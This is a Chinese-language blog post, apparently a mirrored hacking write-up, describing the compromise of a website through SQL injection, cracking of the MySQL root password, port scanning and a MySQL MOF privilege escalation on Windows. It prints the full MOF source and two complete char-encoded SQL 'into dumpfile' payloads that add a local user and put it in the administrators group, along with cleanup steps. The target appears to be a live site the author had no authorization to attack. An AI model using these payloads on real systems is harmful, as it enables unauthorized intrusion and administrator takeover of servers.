zoukankan      html  css  js  c++  java

  • 无shell情况下的mysql远程mof提权利用方法详解

    扫到一个站的注入
    <ignore_js_op> 
    在havij中得到mysql数据库中mysql库保存的数据库密码:
    <ignore_js_op> 
    有时候发现1.15版的还是最好用,最稳定,虽然速度慢了一点。
    照样放到坛子里让机油破了
    <ignore_js_op> 
    感谢Mr.Lu。顺便吐槽下,cmd5连个root都要收费。。。
    在等着密码破解出来的时候顺便nmap了一下
    <ignore_js_op> 
    意外发现端口改到了1126,给后面省下了不少时间。
    照常外连试试
    <ignore_js_op> 
    上个帖子里面有基友问这个软件是什么,我用的是navicat,感觉很好用的
    现在的常规思路就是得到绝对路径,写一个小马,再进一步渗透。
    但是网站上面暴不出路径,看看mysql的路径
    用select @@basedir;命令可以看到;
    <ignore_js_op> 
    网站的路径大概差不多了,懒得一个一个试了,最近mof提权挺火的,上次失败了一次,这次再来试试好了。
    Mof的科普文很多,大家有兴趣看看网盘链接这两个,很详细的,大家共同学习;

    http://pan.baidu.com/share/link?shareid=438074&uk=101689864

    http://pan.baidu.com/share/link?shareid=438077&uk=101689864mof文件内容为:

    1. #pragma namespace("\\.\root\subscription")
    3. instance of __EventFilter as $EventFilter
    4. {
    5.     EventNamespace = "Root\Cimv2";
    6.     Name  = "filtP2";
    7.     Query = "Select * From __InstanceModificationEvent "
    8.             "Where TargetInstance Isa "Win32_LocalTime" "
    9.             "And TargetInstance.Second = 5";
    10.     QueryLanguage = "WQL";
    11. };
    13. instance of ActiveScriptEventConsumer as $Consumer
    14. {
    15.     Name = "consPCSV2";
    16.     ScriptingEngine = "JScript";
    17.     ScriptText =
    18.     "var WSH = new ActiveXObject("WScript.Shell") WSH.run("net.exe user admin admin /add")";
    19. };
    21. instance of __FilterToConsumerBinding
    22. {
    23.     Consumer   = $Consumer;
    24.     Filter = $EventFilter;
    25. };
    复制代码


    于没有马,不能按照网盘里面说的先传一个mof上去,我就直接一次性写入。
    先是试了试直接将原来的语句写入,提示失败,原因就是语句里面很多“;回车”之类的符号。
    然后就想转化为16进制或者asc码这样。
    先试了16进制。
    等了老半天什么还是登陆不上去,就放弃了,改用asc码,用的sql语句为:

    1. select char(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,117,115,101,114,32,97,100,109,105,110,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) into dumpfile  'c:/windows/system32/wbem/mof/nullevt.mof';
    复制代码


    效果就是添加一个用户admin密码admin;
    等了有5秒,登陆框的提示从
    <ignore_js_op> 
    变成了
    <ignore_js_op> [size=0.83em]17 小时前 上传
    下载附件 [size=0.83em](51.04 KB)



    这时候才意识到一个问题,上面的语句只添加了用户,忘了提升为管理员了。。。
    好吧,重新写一遍mof

    1. select char(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,108,111,99,97,108,103,114,111,117,112,32,97,100,109,105,110,105,115,116,114,97,116,111,114,115,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) into dumpfile  'c:/windows/system32/wbem/mof/nullevt.mof';
    复制代码

    好了,这样就顺利登进去了;
    <ignore_js_op> 

    改天研究一下一次性完成添加管理员试试

    现在默认它还是会过5s添加一次用户,解决方法就是:
    第一 net stop winmgmt 停止服务,
    第二 删除文件夹:C:WINDOWSsystem32wbemRepository
    第三 net start winmgmt 启动服务
    还有其他方法在网盘的文件里面有写。

    一路看起来挺顺利的,是因为上次研究过这个。这次写的详细点了。
  • 相关阅读:
    IT asset register
    微前端
    强缓存和弱缓存(协商缓存)
    比较运算规则 == 、 ===、Object.is 和 ToPrimitive 方法 [[DefaultValue]] (hint)
    事件冒泡、事件捕获、事件委托
    mysql服务没有响应控制功能
    React 项目中有哪些细节可以优化?实际开发中都做过哪些性能优化
    算法的时间复杂度与空间复杂度
    算法:42.接雨水
    解决每次git pull、git push都需要输入账号和密码的问题
  • 原文地址:https://www.cnblogs.com/cnsanshao/p/5546872.html
Copyright © 2011-2022 走看看